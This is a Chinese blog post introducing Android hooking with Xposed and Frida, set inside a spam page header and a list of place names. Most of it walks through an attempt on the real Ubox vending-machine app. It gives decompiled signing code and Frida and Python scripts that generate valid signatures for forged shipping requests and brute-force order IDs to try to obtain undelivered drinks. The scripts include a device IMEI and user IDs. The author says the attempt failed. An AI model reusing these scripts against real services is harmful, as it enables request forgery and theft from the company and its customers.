中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

淺談android hook技術

發布時間:2020-08-02 21:14:14 來源:網絡 閱讀:522 作者:lzwxx 欄目:移動開發

Xposed在開機的時候完成對所有的Hook Function的劫持,在原Function執行的前后加上自定義代碼,很多人將這個框架用在對android的私有化定制上面,其實在android安全測試方面這個框架提供了很大的便利,xposed主要是對方法的hook,在以往的重打包技術中,需要對smali代碼的進行修改,修改起來比較麻煩。

利用xposed框架可以很容易的獲取到android應用中的信息,比如加密私鑰、salt值等等,不需要反編譯獲取密鑰轉換算法、不需要了解密鑰保存機制,直接hook函數,獲取輸入輸出就可以。

原理 
在Android系統中,應用程序進程都是由Zygote進程孵化出來的,而Zygote進程是由Init進程啟動的。Zygote進程在啟動時會創建一個Dalvik虛擬機實例,每當它孵化一個新的應用程序進程時,都會將這個Dalvik虛擬機實例復制到新的應用程序進程里面去,從而使得每一個應用程序進程都有一個獨立的Dalvik虛擬機實例。這也是Xposed選擇替換app_process的原因。

Zygote進程在啟動的過程中,除了會創建一個Dalvik虛擬機實例之外,還會將Java運行時庫加載到進程中來,以及注冊一些Android核心類的JNI方法來前面創建的Dalvik虛擬機實例中去。注意,一個應用程序進程被Zygote進程孵化出來的時候,不僅會獲得Zygote進程中的Dalvik虛擬機實例拷貝,還會與Zygote一起共享Java運行時庫。這也就是可以將XposedBridge這個jar包加載到每一個Android應用程序中的原因。XposedBridge有一個私有的Native(JNI)方法hookMethodNative,這個方法也在app_process中使用。這個函數提供一個方法對象利用Java的Reflection機制來對內置方法覆寫。有能力的可以針對xposed的源碼進行分析,不得不說,作者對于android的機制和java的了解已經相當深入了。

簡單實例 
很簡單的一個android登入代碼: 
public class MainActivity extends AppCompatActivity {

private TextView accountView;
private TextView passwdView;
private Button loginBut;
private Button quitBut;

@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);

    accountView = (TextView) findViewById(R.id.account);
    passwdView = (TextView) findViewById(R.id.pwd);

    loginBut = (Button) findViewById(R.id.login);
    quitBut = (Button) findViewById(R.id.quit);

    loginBut.setOnClickListener(new View.OnClickListener() {
        @Override
        public void onClick(View v) {
            String username = accountView.getText() + "";
            String password = passwdView.getText() + "";
            if(isCorrectInfo(username,password)){
                Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show();
            }
            else{
                Toast.makeText(MainActivity.this,"登入失敗",Toast.LENGTH_LONG).show();
            }
        }
    });
}

public boolean isCorrectInfo(String username, String password) {
    if(username.equals("admin") && password.equals("passwd")){
        return true;
    }
    else{
        return false;
    }
}


很簡單的就是判斷下用戶輸入的用戶名和密碼是正確,這里做個簡單的演示,將用戶輸入的用戶名和密碼信息hook出來不管正確與否 
簡單說下xposed模塊的開發,首先需要的是導入api,具體的可以參考:h t t p s :/ / g i t h u b .c o m / r o vo 8 9 / X p o s ed B r i d ge / w i k i/ U s i n g - t h e- X p o s e d - F ra m e w o r k -A P I 
在manifest中定義 

-- coding:utf-8 --

import frida, sys #引入frida類 
import logging

logging.basicConfig(filename=’test.log’, level=logging.INFO)

reload(sys) 
sys.setdefaultencoding(‘utf-8’) #對輸出進行utf8的編碼 
print sys.getdefaultencoding()

def print_result(message): #對輸出的信息進行打印 
print message 
logging.info(message)

def on_message(message, data): # 反調函數,用來接受message的信息,message后面會說到 
try: 
print_result(message=message) 
except: 
pass

did = “255601452” # 訂單id 
time = “1472706588” # 時間戳

jscode = “”” # 核心代碼,這段主要是調用app中的相應處理函數,后面會分析這段代碼的來源

Dalvik.perform(function () { # 說明是Dalvik平臺 
var currentApplication = Dalvik.use(“android.app.ActivityThread”).currentApplication(); 
var context = currentApplication.getApplicationContext(); 
var signclass = Dalvik.use(“com.ub.main.d.e”);# 調用com.ub.main.d.e類 
var signInstance=signclass.$new(context); # 反射創建一個新的對象 
var sign=signInstance.a(“255601452”); #調用對象的a函數 
send(sign); #將調用函數的結果發送出來 
}); 
“”“

print jscode

process = frida.get_device_manager().enumerate_devices()[-1].attach(“com.ub.main”) # 獲取連接的設備并枚舉取最后一個設備連接,并附到com.ub.main的進程上面

print process

script = process.create_script(jscode) # 調用相應的js函數,獲取函數調用后的結果值 
script.on(‘message’, on_message) # 利用回調,將message傳遞給on_message函數 
print “done” 
script.load()

反編譯獲取app中的核心函數 
對于上面的js代碼,其實就是調用app中的某個函數,比如sign值生成函數,加密解密函數,不需要自己單獨的去分析算法流程,分析key值在哪,直接調用app的相應函數,讓app幫我們完成這些工作 
這里我們分析的app是友寶,這是一款飲料售貨機,當時抓包看到提貨的時候是只有個訂單id的,猜想是不是遍歷訂單的id,支付成功但是沒有取貨的訂單會不會響應請求,自己掉貨出來 
下面對友寶的訂單進行分析過程

1、抓取支付訂單成功鏈接 
http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4 postdata:sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh4rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588

分析:sign是校驗值,主要是防止訂單偽造的,orderid是產生的支付訂單id,這個主要是防止偽造用

2、反編譯友寶app 
找到morder/shipping所在的包為:com/ub/main/d/e.class 
其中localStringBuffer存儲的就是url中的參數信息,該請求查找到的代碼在a() 
StringBuffer localStringBuffer = new StringBuffer(); 
localStringBuffer.append(“clientversion”); 
localStringBuffer.append(“=”); 
try 

localStringBuffer.append(Uri.encode(this.e.getPackageManager().getPackageInfo(this.e.getPackageName(), 0).versionName)); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“machine_type”); 
localStringBuffer.append(“=”); 
localStringBuffer.append(Uri.encode(Build.MODEL)); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“os”); 
localStringBuffer.append(“=”); 
localStringBuffer.append(Uri.encode(Build.VERSION.RELEASE)); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“channel_id”); 
localStringBuffer.append(“=”); 
localStringBuffer.append(this.g.u()); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“device_no”); 
localStringBuffer.append(“=”); 
Object localObject1 = “”; 
try 

String str5 = Uri.encode(i.a(this.e)); 
localObject1 = str5; 

catch (Exception localException1) 

Object localObject2; 
for (;;) {} 

localStringBuffer.append((String)localObject1); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“imei”); 
localStringBuffer.append(“=”); 
localObject2 = “”; 
try 

String str4 = Uri.encode(i.b(this.e)); 
localObject2 = str4; 

catch (Exception localException2) 

boolean bool; 
String str1; 
String str2; 
String str3; 
for (;;) {} 

localStringBuffer.append((String)localObject2); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“device_id”); 
localStringBuffer.append(“=”); 
localStringBuffer.append(Uri.encode(“2”)); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“u”); 
localStringBuffer.append(“=”); 
localStringBuffer.append(Uri.encode(this.f.c())); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“wake_id”); 
localStringBuffer.append(“=”); 
localStringBuffer.append(“0”); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“net_type”); 
localStringBuffer.append(“=”); 
localStringBuffer.append(i.g(this.e)); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“carrier_type”); 
localStringBuffer.append(“=”); 
localStringBuffer.append(i.h(this.e)); 
bool = this.f.f(); 
str1 = this.f.l(); 
str2 = this.f.m(); 
if (bool) 

str3 = “4”; 
l.a(“weipeipei”, “get參數—->isUboxAccount = ” + bool + “, s = ” + str3); 
localStringBuffer.append(“&”); 
localStringBuffer.append(“s”); 
localStringBuffer.append(“=”); 
localStringBuffer.append(str3); 
return localStringBuffer.toString().trim(); 


catch (PackageManager.NameNotFoundException localNameNotFoundException) 

for (;;) 

localNameNotFoundException.printStackTrace(); 
continue; 
if ((str1 != null) && (!str1.trim().equals(“”))) { 
str3 = “2”; 
} else if ((str2 != null) && (!str2.trim().equals(“”))) { 
str3 = “3”; 
} else { 
str3 = “0”; 




生成簽名的函數在com/ub/main/d/e.class中的b函數 
public String b(String[][] paramArrayOfString)

輸入的是一個array 
上面的請求函數在: 
public String a(String paramString) 

String[][] arrayOfString = new String[2][]; 
arrayOfString[0] = { “orderId”, paramString }; 
String[] arrayOfString1 = new String[2]; 
arrayOfString1[0] = “timestamp”; 
arrayOfString1[1] = d; 
arrayOfString[1] = arrayOfString1; 
return b(arrayOfString); 
}

最后加上sign值,發送請求

3、可以反編譯出他的sign計算方法,也可以直接調用b函數來產生sign值,后來發現app會自動取時間戳,我們就不需要給他array型的參數,直接調用a函數,把orderId給他,讓他直接return一個值出來就好了,就有了上面的js代碼

4、自動化的批量處理 
看代碼

author = ‘gaohe’

-- coding:utf-8 --

import frida, sys 
import logging 
import requests

logging.basicConfig(filename=’test.log’, level=logging.INFO)

reload(sys) 
sys.setdefaultencoding(‘utf-8’)

print sys.getdefaultencoding()

class ubox: 
def init(self): 
pass

def request(self, payload):
    # print "requests"
    dict = {}
    url = "http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4"
    for i in payload.split("&"):
        key = i.split("=")[0]
        value = i.split("=")[1]
        dict[key] = value

    data=dict

    r=requests.post(url=url,data=data)

    print r.text

def print_result(self, message):
    # print message
    payload = message["payload"]
    print payload
    self.request(payload)

def on_message(self, message, data):
    self.print_result(message=message)

def fuzzing(self, did):
    jscode = """
    Dalvik.perform(function () {
    var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();
    var context = currentApplication.getApplicationContext();
    var signclass = Dalvik.use("com.ub.main.d.e");
    var signInstance=signclass.$new(context);
    var sign=signInstance.a("%s");
    send(sign);
    });
    """ % did
    # print jscode
    process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main")
    # print process
    script = process.create_script(jscode)
    script.on('message', self.on_message)
    # print "done"
    script.load()
    # sys.stdin.read()

ub = ubox() 
ub.fuzzing(“255912964”)

構造了一個類,后面直接fuzz uid就可以了,提取里面的sign值拼接到post數據中去 
可以產生的post請求和抓到的數據包的請求是完全一樣的,但是并沒有測試成功,分析原因有可能是訂單id和用戶的id有所綁定。 
不過學習到了怎樣通過frida對app進行分析。


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

柳州市| 如东县| 通城县| 体育| 肥城市| 西城区| 南宁市| 抚顺县| 罗源县| 平阳县| 屏东市| 娄底市| 邹平县| 洛浦县| 嘉荫县| 黄浦区| 齐河县| 汕头市| 金坛市| 三穗县| 仲巴县| 治县。| 肇州县| 自贡市| 乌兰察布市| 革吉县| 鹤岗市| 蓝山县| 喀什市| 贡觉县| 红桥区| 梁山县| 阳东县| 扎赉特旗| 页游| 常德市| 务川| 维西| 扶绥县| 威远县| 黄大仙区|